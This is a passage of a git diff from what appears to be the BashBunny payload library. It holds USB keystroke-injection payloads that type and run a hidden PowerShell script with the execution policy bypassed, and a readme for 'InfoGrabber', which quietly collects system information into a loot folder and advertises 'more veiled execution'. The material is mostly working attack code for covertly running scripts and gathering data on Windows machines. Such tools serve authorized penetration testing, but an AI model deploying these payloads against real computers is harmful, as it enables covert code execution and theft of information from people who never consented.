SWITCH_POSITION="switch1"
elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then
SWITCH_POSITION="switch2"
elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then
SWITCH_POSITION="switch3"
else
SWITCH_POSITION="invalid"
fi
}
check_switch
# Set your language here
QUACK SET_LANGUAGE no
QUACK GUI r
QUACK DELAY 200
# Open run and run the run.ps1 script in the Bashbunny
QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
QUACK ENTER
LED G
#Green means good to go
LED ATTACK
# Run the run.ps1 script in the BashBunny
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED FINISH

19
payloads/library/recon/InfoGrabber/readme.md
View File

@ -1,10 +1,13 @@
# InfoGrabber for the Bunnys
# Info Grabber for the BashBunny
Author: Simen Kjeserud
Original Author Simen Kjeserud
Version: Version 1.0
V2.0 Author: DannyK999
Version: Version 2.0
Credit: Hak5Darren, Hak5 and Simen Kjeserud for inspiration
Credit: Hak5Darren for inspiration
((`\
___ \\ '--._
@ -12,13 +15,15 @@ Credit: Hak5Darren for inspiration
/ \ '. __.'
_| /_ \ \_\_
{_\______\-'\__\_\
Check out my website:
Check out Simen's website:
aknemis.com
## Description
Gather a lot of information about the computer and place it in a text file in loot/info/.
Updates include code/output cleanup, faster runtime, and more veiled execution.
Here you can se what it will look like:
@ -64,10 +69,6 @@ Here you can se what it will look like:
Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input.
## Requirements
DuckyTools for the BashBunny, and you need to change to the language the computer uses.
## STATUS
| LED | Status |

12
payloads/library/recon/Link File analysis/payload.txt
View File

@ -1,12 +0,0 @@
LED R B 100
ATTACKMODE HID STORAGE
DUCKY_LANG gb
LED B
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go

13
payloads/library/Incident_Response/Link File analysis/payload.txt → payloads/library/recon/Link_File_analysis/payload.txt
View File

@ -1,12 +1,7 @@
LED R B 100
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
DUCKY_LANG gb
LED B
LED ATTACK
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go
LED FINISH

0
payloads/library/recon/Link File analysis/readme.md → payloads/library/recon/Link_File_analysis/readme.md
View File

0
payloads/library/recon/Link File analysis/run.ps1 → payloads/library/recon/Link_File_analysis/run.ps1
View File

Some files were not shown because too many files have changed in this diff Show More